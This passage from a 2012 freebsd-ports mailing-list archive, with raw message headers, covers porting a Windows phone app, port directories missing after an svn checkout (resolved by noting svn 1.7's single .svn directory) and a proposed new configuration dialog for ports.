plans, busy/vacation statuses, etc. PR system is too passive, and from past. (Of course, it's working, and this is great, but there will be 2013 soon, and some effective issue system is just jumping to be adopted by project) IMHO of course. > > G'luck, > Peter > > -- > Peter Pentchev roam@ringlet.net roam@FreeBSD.org peter@packetscale.com > PGP key: http://people.FreeBSD.org/~roam/roam.key.asc > Key fingerprint 2EE7 A7A5 17FC 124C F115 C354 651E EFB0 2527 DF13 > If I had finished this sentence, > -- Regards, Alexander Yerenkow From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 11:56:12 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 3E359207 for ; Thu, 29 Nov 2012 11:56:12 +0000 (UTC) (envelope-from jakub_lach@mailplus.pl) Received: from sam.nabble.com (sam.nabble.com [216.139.236.26]) by mx1.freebsd.org (Postfix) with ESMTP id 146AE8FC12 for ; Thu, 29 Nov 2012 11:56:10 +0000 (UTC) Received: from [192.168.236.26] (helo=sam.nabble.com) by sam.nabble.com with esmtp (Exim 4.72) (envelope-from ) id 1Te2iw-0006vt-50 for freebsd-ports@freebsd.org; Thu, 29 Nov 2012 03:56:10 -0800 Date: Thu, 29 Nov 2012 03:56:10 -0800 (PST) From: Jakub Lach To: freebsd-ports@freebsd.org Message-ID: <1354190170149-5765192.post@n5.nabble.com> In-Reply-To: References: Subject: Re: Porting MyPhoneExplorer to FreeBSD/Linux MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 11:56:12 -0000 Who do you thank exactly? I doubt any developers of said application are subscribed to this list. I don't know if you know what you are asking for, but "porting" closed source windows application is not possible, it would be needed to be wrote from scratch, which is rather outside of even broadest definition of porting, more of a reimplementation. Moreover, if somebody capable of it would need something like that (I'm not sure what this application do though), said "port" would be already written. Best said exactly what you need to do on FreeBSD system on FreeBSD-questions or some linux forum and maybe somebody will come up with an idea how to achieve that, or will point you to tools already available. You can also try to run this Windows application under Wine on FreeBSD or Linux but I don't know how far it would get you. But unless you try, you will never know. Good luck. -- View this message in context: http://freebsd.1045724.n5.nabble.com/Porting-MyPhoneExplorer-to-FreeBSD-Linux-tp5765004p5765192.html Sent from the freebsd-ports mailing list archive at Nabble.com. From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 12:47:35 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id CC38E52C for ; Thu, 29 Nov 2012 12:47:35 +0000 (UTC) (envelope-from jeffreybouquet@yahoo.com) Received: from nm9-vm4.bullet.mail.gq1.yahoo.com (nm9-vm4.bullet.mail.gq1.yahoo.com [98.136.218.243]) by mx1.freebsd.org (Postfix) with ESMTP id 89ECC8FC14 for ; Thu, 29 Nov 2012 12:47:35 +0000 (UTC) Received: from [98.137.12.189] by nm9.bullet.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 12:45:24 -0000 Received: from [98.137.12.245] by tm10.bullet.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 12:45:24 -0000 Received: from [127.0.0.1] by omp1053.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 12:45:24 -0000 X-Yahoo-Newman-Property: ymail-3 X-Yahoo-Newman-Id: 422882.68386.bm@omp1053.mail.gq1.yahoo.com Received: (qmail 41337 invoked by uid 60001); 29 Nov 2012 12:45:24 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1354193123; bh=dXV76XO/EqUGHvZbMN1Os4leqA1pwAuihlfNZqdPhjs=; h=X-YMail-OSG:Received:X-Rocket-MIMEInfo:X-Mailer:Message-ID:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=Ls8bPvplmPQJvI7mO+6iT6DxagpVtpLA+mAmnN49gYIqIX7NDmG7WKNQjEeDF+O7jMG0mB2qJ/xs5H7U3dqhdVSjMRlB9BegLFNIcajuWvaSnvAd3z8KTYZvxrkxFLopAMlzOuA67Ego/CyRRpVhCREKGOwnPlSlv5gQxkS2En8= DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:X-Rocket-MIMEInfo:X-Mailer:Message-ID:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=GPdaSHmW2sJ0VWOMe17Nl3FCTeTV7ORS2MgCs1jwBeNjO+b+3SnuQWoVuzbl2JKxxl0hIX1YE6tSmjCF3Slv3Yrn+kpfuWdsoDkicKPriKh3SBU0ONtglxP146Occc0tFcV9UzyTly4lCC6CPPt0WGn0vqmrnKnBlGrFkvO+ODE=; X-YMail-OSG: 4vuZ8sYVM1nobrrLsu_t0F.btH6fl1MfjEVBdDCbupyF8FD YXNK1sBrFIIXi_RqgNhziMrNs.9Cc9YKLoPx1kUjZ_ObfPxeSp0wtUgn6ToM 7Aeh.neGpDTlcatuhAasYPegPyFQZ9GDFa4ZG7_Bgfaprr7NOtByrHclHSZn Pq7spicPoikf2du6KpwvkowOMC_8JkfaCQYrvRPEqfrcyBBQ_6_MtuoHvEKm LIN2nAs7bykB3byc7AJPpHW.zC55Z17UlCSCxMVKlpmr5t.wBwliCBIYeSfj SRscxL_XlFL9tZYYb5G0_VAoD37qoDA.BDEl6nIZgHR9DCAj4bnVNJ8rLaZY MDmkrw7Xk9JXZGL_.p5SJRRVA1XAceRORGCEJK89zOPaUSrt.AKZDtJOdZO3 aU4XGRRq1bWAg2l49aKchlc7Z2wjrdSke8hBZGeb5G4u2tcyKCqPpwf8Q13i 1tjfnDJ4OVnZT5qOIqhbDuI14KYSZ_5b5urueih82sdHy3I_wqfR.OEc78XM aRlzM Received: from [66.92.43.99] by web164001.mail.gq1.yahoo.com via HTTP; Thu, 29 Nov 2012 04:45:23 PST X-Rocket-MIMEInfo: 001.001, DQoNCi0tLSBPbiBXZWQsIDExLzI4LzEyLCBKZWZmcmV5IEJvdXF1ZXQgPGplZmZyZXlib3VxdWV0QHlhaG9vLmNvbT4gd3JvdGU6DQoNCkZyb206IEplZmZyZXkgQm91cXVldCA8amVmZnJleWJvdXF1ZXRAeWFob28uY29tPg0KU3ViamVjdDogUmU6IC9hcmNoaXZlcnMvIGlzIG1pc3NpbmcgYWZ0ZXIgc3ZuLi4uDQpUbzogZnJlZWJzZC1wb3J0c0BmcmVlYnNkLm9yZw0KRGF0ZTogV2VkbmVzZGF5LCBOb3ZlbWJlciAyOCwgMjAxMiwgODoyOCBQTQ0KDQoNCg0KLS0tIE9uIFdlZCwgMTEvMjgvMTIsIEplZmZyZXkBMAEBAQE- X-Mailer: YahooMailClassic/15.0.8 YahooMailWebService/0.8.127.475 Message-ID: <1354193123.3531.YahooMailClassic@web164001.mail.gq1.yahoo.com> Date: Thu, 29 Nov 2012 04:45:23 -0800 (PST) From: Jeffrey Bouquet Subject: Re: /archivers/ is missing after svn... To: freebsd-ports@freebsd.org In-Reply-To: <1354163331.95052.YahooMailClassic@web164001.mail.gq1.yahoo.com> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 12:47:35 -0000 --- On Wed, 11/28/12, Jeffrey Bouquet wrote: From: Jeffrey Bouquet Subject: Re: /archivers/ is missing after svn... To: freebsd-ports@freebsd.org Date: Wednesday, November 28, 2012, 8:28 PM --- On Wed, 11/28/12, Jeffrey Bouquet wrote: From: Jeffrey Bouquet Subject: /archivers/ is missing after svn... To: freebsd-ports@freebsd.org Date: Wednesday, November 28, 2012, 8:20 PM As in the subject.=A0 Anyone else? r 307953 UPDATE:=20 OTOH I can svn it independently to elsewhere than ports, any canonical way to move that /tmp/archivers to /usr/ports/archivers ? DONE: moved that /tmp/archivers to /usr/ports/archivers, strangely I did not find= its .svn after the move.=20 So a port sees /usr/ports/archivers, but still fails to configure.=A0 I'll = wait a while to see if that changes...=A0=A0 Don't know enough about the port nor svn to= figure out much more about it. From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 12:54:24 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id CDAF8B3B for ; Thu, 29 Nov 2012 12:54:24 +0000 (UTC) (envelope-from yerenkow@gmail.com) Received: from mail-oa0-f54.google.com (mail-oa0-f54.google.com [209.85.219.54]) by mx1.freebsd.org (Postfix) with ESMTP id 881D78FC15 for ; Thu, 29 Nov 2012 12:54:24 +0000 (UTC) Received: by mail-oa0-f54.google.com with SMTP id n9so18550077oag.13 for ; Thu, 29 Nov 2012 04:54:24 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=IIqbVEx+tyG1j6xlAEaonSE7QXo5sJQcycJWMBq+VzQ=; b=GCbb23h2VdxZ1dT13RO8n4n4tqNhhRkwV1tFKWIZkfZxjZbkwE2FHsM8VVB6rwlGR+ 2AA0QOtCPKOuXFMGHvJHxaIbIFvjZbfl0pphp3wCt7diifWuDXxYHrrD+ZpfjPTEFoDL iNDXapw0MxHzLC5SWulyghMQk3HMBqX8BeOzaZRuDlL4GMu7dvzFPzycDSw4yLUE9Ra3 0QvH4CNURLsU4WVc+5KdEWlBy03Ca3SjojuiZiQ+wMcXCvRdLpG5zvFk6s4b0rMTSWda Csi25BZ3lGCgAbUnZggvrYcUtrCFCvgJTL33/bFuxVagRKcRsdV6DoJFrTQZ2opcu1Dp xXJA== MIME-Version: 1.0 Received: by 10.182.132.112 with SMTP id ot16mr7680317obb.69.1354193664115; Thu, 29 Nov 2012 04:54:24 -0800 (PST) Received: by 10.60.170.167 with HTTP; Thu, 29 Nov 2012 04:54:24 -0800 (PST) In-Reply-To: <1354193123.3531.YahooMailClassic@web164001.mail.gq1.yahoo.com> References: <1354163331.95052.YahooMailClassic@web164001.mail.gq1.yahoo.com> <1354193123.3531.YahooMailClassic@web164001.mail.gq1.yahoo.com> Date: Thu, 29 Nov 2012 14:54:24 +0200 Message-ID: Subject: Re: /archivers/ is missing after svn... From: Alexander Yerenkow To: Jeffrey Bouquet Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.14 Cc: freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 12:54:24 -0000 Could you run svn status in /usr/ports ? -- Regards, Alexander Yerenkow From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 13:10:06 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 942CDE2F for ; Thu, 29 Nov 2012 13:10:06 +0000 (UTC) (envelope-from jeffreybouquet@yahoo.com) Received: from nm9-vm3.bullet.mail.gq1.yahoo.com (nm9-vm3.bullet.mail.gq1.yahoo.com [98.136.218.242]) by mx1.freebsd.org (Postfix) with ESMTP id 4DC658FC12 for ; Thu, 29 Nov 2012 13:10:06 +0000 (UTC) Received: from [98.137.12.61] by nm9.bullet.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 13:10:00 -0000 Received: from [98.137.12.226] by tm6.bullet.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 13:09:59 -0000 Received: from [127.0.0.1] by omp1034.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 13:09:59 -0000 X-Yahoo-Newman-Property: ymail-3 X-Yahoo-Newman-Id: 970866.63414.bm@omp1034.mail.gq1.yahoo.com Received: (qmail 7559 invoked by uid 60001); 29 Nov 2012 13:09:59 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1354194599; bh=shDsGtbTrNs6KcTVd/20LWeQDCv4ukZwV/ZvlLF+ARQ=; h=X-YMail-OSG:Received:X-Rocket-MIMEInfo:X-Mailer:Message-ID:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=rHsR+i5NJtati34bSmXOROCYnD26UEWJCXhHbwrcMPu/KkDW9fvBiI+B7D84f7QpoH4pIZL1Av7y34vWDEO3PS03hiXAudFsVW1QcXsV1iyAH9Kq4O9zI7BVAAqYG0MEpN2gJ3c5ofk5GHPcY/NfBu7xT4Wi8xVdsibPksOW21o= DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:X-Rocket-MIMEInfo:X-Mailer:Message-ID:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=GqwBrWejdjAnjJrLk/VgKmPVextFW9qqS03SBhemUGt7+4rNV8UsSUSYZ461Q69h155ylIKQEIwfP9IkA3luT4P/3t4MaQvR2sXQt4nB724M7/o5BkHPXYkRm/l0i8WHAYmngIebbeJ8/Y9Wgw7trEkYOLE+emowgblIhuHLwmo=; X-YMail-OSG: O8teeS8VM1m3XoxTc8YJPN3Pi6KytinadUuovwp2cg5lvU8 uDBRzt29RIv5IVZcfXLyhsMJrEQwnnR2F1_rCC78cdq7QnfE.mqC8_zy2yIE 0SvGPo2.evY07Hl9mHjhB2AL5u0irqXA2yfYCjoL4Jf0mitoHGZEOXxKfV0d wkRldXTAozfFQPyIS3PIe9ynvE_yID55zTs5N3iQKhydyZ84ufxGErtDPLPJ 2VmjVwu33fGH64t.j35_qpQvourLIBbKi_YqiSX.YyfJCYpMNSSVmxRIt1kl .6ngMUY_XpsynsKleYJjraPpdpFcz_sxcGTViXy_ZyzRfUMKqvbWAOrXBQDZ t1MkvaHm.I3WeeuuZHJi1YN44j8aVHh6UWcgR2zotqmawGbBpbhamDPwN39G WzedaxHg.2wN1uKdmYpUT8sEkX_mu15_9ZmkpkWBcnvtLg.ow1fDrKhkL0FD 63PzZRvnFwO81eUEelNxeQxKHQNNzi97BSY6Vyu9T5DYk2Dlk4PL3E39lYcs i8W3z Received: from [66.92.43.99] by web164003.mail.gq1.yahoo.com via HTTP; Thu, 29 Nov 2012 05:09:59 PST X-Rocket-MIMEInfo: 001.001, DQoNCi0tLSBPbiBUaHUsIDExLzI5LzEyLCBBbGV4YW5kZXIgWWVyZW5rb3cgPHllcmVua293QGdtYWlsLmNvbT4gd3JvdGU6DQoNCkZyb206IEFsZXhhbmRlciBZZXJlbmtvdyA8eWVyZW5rb3dAZ21haWwuY29tPg0KU3ViamVjdDogUmU6IC9hcmNoaXZlcnMvIGlzIG1pc3NpbmcgYWZ0ZXIgc3ZuLi4uDQpUbzogIkplZmZyZXkgQm91cXVldCIgPGplZmZyZXlib3VxdWV0QHlhaG9vLmNvbT4NCkNjOiBmcmVlYnNkLXBvcnRzQGZyZWVic2Qub3JnDQpEYXRlOiBUaHVyc2RheSwgTm92ZW1iZXIgMjksIDIwMTIsIDQBMAEBAQE- X-Mailer: YahooMailClassic/15.0.8 YahooMailWebService/0.8.127.475 Message-ID: <1354194599.84316.YahooMailClassic@web164003.mail.gq1.yahoo.com> Date: Thu, 29 Nov 2012 05:09:59 -0800 (PST) From: Jeffrey Bouquet Subject: Re: /archivers/ is missing after svn... To: Alexander Yerenkow , freebsd-ports@freebsd.org In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 13:10:06 -0000 --- On Thu, 11/29/12, Alexander Yerenkow wrote: From: Alexander Yerenkow Subject: Re: /archivers/ is missing after svn... To: "Jeffrey Bouquet" Cc: freebsd-ports@freebsd.org Date: Thursday, November 29, 2012, 4:54 AM Could you run svn status in /usr/ports ? --=20 Regards, Alexander Yerenkow _______________________________________________ The only things that stand out are: ?=A0 x11-clocks ?=A0 archivers besides INDEX-9, etc.=20 J. Bouquet From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 13:12:58 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id C6E95F04; Thu, 29 Nov 2012 13:12:58 +0000 (UTC) (envelope-from ruM1cRO@yandex.ru) Received: from forward19.mail.yandex.net (forward19.mail.yandex.net [IPv6:2a02:6b8:0:1402::4]) by mx1.freebsd.org (Postfix) with ESMTP id 3C4C28FC16; Thu, 29 Nov 2012 13:12:58 +0000 (UTC) Received: from web5g.yandex.ru (web5g.yandex.ru [95.108.252.105]) by forward19.mail.yandex.net (Yandex) with ESMTP id 646551121B8E; Thu, 29 Nov 2012 17:12:56 +0400 (MSK) Received: from 127.0.0.1 (localhost.localdomain [127.0.0.1]) by web5g.yandex.ru (Yandex) with ESMTP id BDFE01D0002; Thu, 29 Nov 2012 17:12:55 +0400 (MSK) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yandex.ru; s=mail; t=1354194776; bh=xHgHg6LpBWMS7poHKaxNy/qDTFxmhNaWtlok4WbN+YE=; h=From:To:Cc:Subject:Date; b=F+CYG1YgrYNue7p88RGyB6P7D3fmiKajOKZ03amM8tkqRrGvPr29wcMSkA7LfN5/o J13D3NCexzsBZUe8fNb19EgeiJsZBgMGK1Ccnf6ymEX4HbaHSO+C5U4KFDl2MZkF6X 2TG+WqN8oLNs3noTr6jtngpc6FChvzH2rsNzen9k= Received: from owa.dbdc.luxoft.com (owa.dbdc.luxoft.com [213.208.171.196]) by web5g.yandex.ru with HTTP; Thu, 29 Nov 2012 17:12:55 +0400 From: Ilya A. Arkhipov To: freebsd-ports@freebsd.org Subject: Discussion concerning: New dialog for ports MIME-Version: 1.0 Message-Id: <695411354194775@web5g.yandex.ru> X-Mailer: Yamail [ http://yandex.ru ] 5.0 Date: Thu, 29 Nov 2012 17:12:55 +0400 Content-Transfer-Encoding: 7bit Content-Type: text/plain Cc: kwm@freebsd.org, bapt@freebsd.org, Eitan Adler , Alexey Dokuchaev X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 13:12:58 -0000 Hi Folks, Few week ago I started work on new dialog for ports, main idea it's adding functionality, I guess you know ;) I took checklist.c from libdialog and modified it for us. Regarding license, I discussed with Thomas E. Dickey(author dialog) he said I can't change LGPL to BSD but it should not be a problem. What we have now: - check + radio lists in on box (and yes we can put off radiobox) - separate line with text - dynamic width/height size - all features from checklist.c :) -- mouse support -- hotkey for find a lines My plan: - add Help button/F1/alt-h/esc-1 (actually don't know how will be better) - button for license - fixing bugs >_< - start work on parsing receiving data, after that should be ready for testing. Regarding parsing data I want discuss here. Wanna correct understand what will be better, now I have few variants: 1. Get all data from env. variables 2. Use the same with old dialog style, I mean receive from STDIN 3. From file? <- guess bad idea Your ideas? And certainly screeshots: Big description(just for test); In X -- http://imm.io/NkVR In Terminal -- https://www.dropbox.com/s/bzt8zszpk40jrso/2012-11-29%2014.59.53.jpg With license button: in X -- http://imm.io/Nl9K You can find my repo there: https://bitbucket.org/m1cro/d4p/. I'll be happy for all response ;) -- With Best Regards, Ilya A. Arkhipov From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 13:25:11 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id BE8DB332 for ; Thu, 29 Nov 2012 13:25:11 +0000 (UTC) (envelope-from jeffreybouquet@yahoo.com) Received: from nm8-vm6.bullet.mail.gq1.yahoo.com (nm8-vm6.bullet.mail.gq1.yahoo.com [98.136.218.229]) by mx1.freebsd.org (Postfix) with ESMTP id 747878FC0C for ; Thu, 29 Nov 2012 13:25:11 +0000 (UTC) Received: from [98.137.12.191] by nm8.bullet.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 13:22:04 -0000 Received: from [98.137.12.53] by tm12.bullet.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 13:22:04 -0000 Received: from [127.0.0.1] by omp1068.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 13:22:04 -0000 X-Yahoo-Newman-Property: ymail-3 X-Yahoo-Newman-Id: 374347.76674.bm@omp1068.mail.gq1.yahoo.com Received: (qmail 13747 invoked by uid 60001); 29 Nov 2012 13:22:04 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1354195324; bh=ZTroVSrwekqbY0Sz54paB60soDFjxab9FiDNqDjwark=; h=X-YMail-OSG:Received:X-Rocket-MIMEInfo:X-Mailer:Message-ID:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=xruLZuAU3BerfgoDy4ky+EOoebuur9JzkuwSQl3tCP9Wa1/euUCz49eanYhiUzwWNNTXnQUwQdCDk1+W+jpWZlC7IISSQLfxiGXDRSoQzsSDnNjwICg8hqqs2B/H1s0YsoYTy6n24tFvR7ZvyNYhIQBGllTwXxsy/q7UpM+wazw= DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:X-Rocket-MIMEInfo:X-Mailer:Message-ID:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=j9wgdbLV5cHbPayT5Xzri3F1MV3akJvb3KzgxWeW5EPomRJIuPxj6dBYN20Nmg08DhvB013kWBWIA+hQXyWlkgMaW71XE78doJirP6Z01ZOxvCYCxv4n8qhxDNkP4h9KxULdKiE57aqf9lxbHczgBiaQXu6IYfRB2LnrdvFNbs8=; X-YMail-OSG: M7LevfUVM1njwasPQkbdUkgF3CdQnupHLikv1eAXwIisYiz hInnjGrkRSAn2NubwkiqCjiM75CCe7IUtZdfl.GQGsIftkY9MdwJrzHIVAv0 KZeDCa8Jq9kDnZ.wAgioR3vDh4s7wtgN.ctO2GG9Yxosk0VkiMREnteMl0Pn ChAIQAcjkhDkZHqKehPIq_1Cu1UIzFR.WhGHgRRDhGzTONAXkrqSqtlSCaZR WfgH3R2emBSbqT6fKr0YRdiCRMiIuZaO7pAFLcJrhXB3cR747yU2xUnPue5S u.wQockWyH9ph49RvPky0X0Y43AGV31ZAMU7_mk8jMjrc5ykXiDuILGjBaAN hz0kCaDzqbEbIxp7nms6fCyg6KUWoCmID0N4Oa8cspYxEPYUvgDRYXQRKnyU YAB5998bahKwZNYTCk4I7f6.6_whFkFKEvyn5Nx98aXczvstkiIAEcX1GXM3 Nju04k6nFQ1kWuv8e4H0yckCnCCtZfe_WLSMHzR5vl2RtuhQms8Zbh45innD WiA9j Received: from [66.92.43.99] by web164004.mail.gq1.yahoo.com via HTTP; Thu, 29 Nov 2012 05:22:04 PST X-Rocket-MIMEInfo: 001.001, DQoNCi0tLSBPbiBUaHUsIDExLzI5LzEyLCBKZWZmcmV5IEJvdXF1ZXQgPGplZmZyZXlib3VxdWV0QHlhaG9vLmNvbT4gd3JvdGU6DQoNCkZyb206IEplZmZyZXkgQm91cXVldCA8amVmZnJleWJvdXF1ZXRAeWFob28uY29tPg0KU3ViamVjdDogUmU6IC9hcmNoaXZlcnMvIGlzIG1pc3NpbmcgYWZ0ZXIgc3ZuLi4uDQpUbzogIkFsZXhhbmRlciBZZXJlbmtvdyIgPHllcmVua293QGdtYWlsLmNvbT4sIGZyZWVic2QtcG9ydHNAZnJlZWJzZC5vcmcNCkRhdGU6IFRodXJzZGF5LCBOb3ZlbWJlciAyOSwgMjAxMiwgNToBMAEBAQE- X-Mailer: YahooMailClassic/15.0.8 YahooMailWebService/0.8.127.475 Message-ID: <1354195324.13416.YahooMailClassic@web164004.mail.gq1.yahoo.com> Date: Thu, 29 Nov 2012 05:22:04 -0800 (PST) From: Jeffrey Bouquet Subject: Re: /archivers/ is missing after svn... To: freebsd-ports@freebsd.org In-Reply-To: <1354194599.84316.YahooMailClassic@web164003.mail.gq1.yahoo.com> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 13:25:11 -0000 --- On Thu, 11/29/12, Jeffrey Bouquet wrote: From: Jeffrey Bouquet Subject: Re: /archivers/ is missing after svn... To: "Alexander Yerenkow" , freebsd-ports@freebsd.org Date: Thursday, November 29, 2012, 5:09 AM --- On Thu, 11/29/12, Alexander Yerenkow wrote: From: Alexander Yerenkow Subject: Re: /archivers/ is missing after svn... To: "Jeffrey Bouquet" Cc: freebsd-ports@freebsd.org Date: Thursday, November 29, 2012, 4:54 AM Could you run svn status in /usr/ports ? --=20 Regards, Alexander Yerenkow _______________________________________________ The only things that stand out are: ?=A0 x11-clocks ?=A0 archivers besides INDEX-9, etc.=20 UPDATED: /shells/ has also gone missing.=A0 I'm wondering if the original svn of the= =20 source tree missed those two somehow... or they disappeared during a fsck_ffs -y command, or the cntl-c of a { svn ... --depth files } which I had to unexpectedly end because it was taking longer than=20 several *hours*... =A0J. Bouquet From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 14:39:35 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 64407AE6 for ; Thu, 29 Nov 2012 14:39:35 +0000 (UTC) (envelope-from ronald-freebsd8@klop.yi.org) Received: from smarthost1.greenhost.nl (smarthost1.greenhost.nl [195.190.28.78]) by mx1.freebsd.org (Postfix) with ESMTP id 135528FC08 for ; Thu, 29 Nov 2012 14:39:34 +0000 (UTC) Received: from smtp.greenhost.nl ([213.108.104.138]) by smarthost1.greenhost.nl with esmtps (TLS1.0:RSA_AES_256_CBC_SHA1:32) (Exim 4.69) (envelope-from ) id 1Te5Gv-0000cl-NT for freebsd-ports@freebsd.org; Thu, 29 Nov 2012 15:39:26 +0100 Received: from [81.21.138.17] (helo=ronaldradial.versatec.local) by smtp.greenhost.nl with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:32) (Exim 4.72) (envelope-from ) id 1Te5Gv-0000YR-DQ for freebsd-ports@freebsd.org; Thu, 29 Nov 2012 15:39:25 +0100 Content-Type: text/plain; charset=utf-8; format=flowed; delsp=yes To: freebsd-ports@freebsd.org Subject: Re: /archivers/ is missing after svn... References: <1354193123.3531.YahooMailClassic@web164001.mail.gq1.yahoo.com> Date: Thu, 29 Nov 2012 15:39:24 +0100 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit From: "Ronald Klop" Message-ID: In-Reply-To: <1354193123.3531.YahooMailClassic@web164001.mail.gq1.yahoo.com> User-Agent: Opera Mail/12.11 (Win32) X-Virus-Scanned: by clamav at smarthost1.samage.net X-Spam-Level: / X-Spam-Score: -0.0 X-Spam-Status: No, score=-0.0 required=5.0 tests=BAYES_20 autolearn=disabled version=3.3.1 X-Scan-Signature: 66f4fda096222dd2b2010deb1ce817c5 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 14:39:35 -0000 On Thu, 29 Nov 2012 13:45:23 +0100, Jeffrey Bouquet wrote: > > > --- On Wed, 11/28/12, Jeffrey Bouquet wrote: > > From: Jeffrey Bouquet > Subject: Re: /archivers/ is missing after svn... > To: freebsd-ports@freebsd.org > Date: Wednesday, November 28, 2012, 8:28 PM > > > > --- On Wed, 11/28/12, Jeffrey Bouquet wrote: > > From: Jeffrey Bouquet > Subject: /archivers/ is missing after svn... > To: freebsd-ports@freebsd.org > Date: Wednesday, November 28, 2012, 8:20 PM > > As in the subject. Anyone else? > r 307953 > > UPDATE: > > OTOH I can svn it independently to elsewhere than ports, any canonical > way > to move that /tmp/archivers to /usr/ports/archivers ? > > DONE: > moved that /tmp/archivers to /usr/ports/archivers, strangely I did not > find its > .svn after the move. > So a port sees /usr/ports/archivers, but still fails to configure. I'll > wait a while > to see if that changes... Don't know enough about the port nor svn to > figure > out much more about it. > _______________________________________________ > freebsd-ports@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-ports > To unsubscribe, send any mail to "freebsd-ports-unsubscribe@freebsd.org" > Hi, Since subversion (svn) 1.7 there is only one .svn directory in the root of your checkout. Not in every subdir anymore. Ronald. From owner-freebsd-ports@FreeBSD.ORG 